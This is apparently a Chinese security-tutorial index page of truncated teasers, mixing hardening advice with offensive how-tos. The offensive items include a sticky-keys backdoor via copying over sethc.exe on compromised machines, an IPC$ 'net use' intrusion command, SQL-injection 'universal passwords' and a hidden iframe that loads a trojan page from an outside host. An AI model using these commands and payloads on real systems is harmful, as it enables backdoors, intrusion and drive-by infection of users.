小编 安全教程 如何使用sqlcmd.exe 连接到数据库引擎 SQL Server 支持使用 TCP/IP 网络协议(默认值)、命名管道协议和 VIA 协议的客户端通信。如果客户端要连接到同一计算机上的数据库引擎实例,则也可以使用共享内存协议。通常有三种选择协议的方法。sqlcmd 实用工具使用的协议按以下顺序确...
小编 安全教程 高手支招:通过进程抓马 对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大家揭开进程的神秘面纱。 实例一:和进程的&ldqu...
小编 安全教程 按5次shift 键后门 利用方法 过程:肉鸡CMD下运行copy c:\\windows\\explorer.exe c:\\windows\\system32\\sethc.exe copy c:\\windows\\system32\\sethc.exe c:\\windows\\...
小编 安全教程 ASP注入万能登陆密码 《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码: 程序代码 <% username=trim(Request.Form("username")) password=...
小编 安全教程 突破一流拦截 上传限制的方法 这是因为它设置了限制提交字符,既然它不允许我们进行提交,那我们可以采用下载的方法.这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中.好了,这个方法就是,只要服务器没有禁用XML和数据流组...
小编 安全教程 容易被黑客攻击的10个漏洞 应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散,但它们也同样会造成很多问题,从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是一件简单的事,而不幸的是对应用程...
小编 安全教程 139入侵简易教程 net use\\\\192.168.0.1\\ipc$Content$nbsp;"" /user:administrator 提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简...
小编 安全教程 命令行下一种新的添加帐号的方法 它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件.不过加用户的话,这一个 Shell.Users就足够了.那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的...
小编 安全教程 有史以来最牛的服务器反黑全集 Win2k的缺省安装很容易被攻击者取得帐号列表,即使安装了最新的Service ack也是如此。 方案一 1.打补丁 微软的作风就是三天一小补,五天一大补,漏洞太多,补一点就好一点,使用“开始-WindowsUpdate&quo...
小编 安全教程 PHP 万能密码 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。 其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。 其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。 如果你用这样的万能密码\&...
小编 安全教程 hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁) 这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数. 正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码: 复制代码 代码如下: Function Sa...
小编 安全教程 网页挂马方法和技巧大汇总 1,挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0>&l...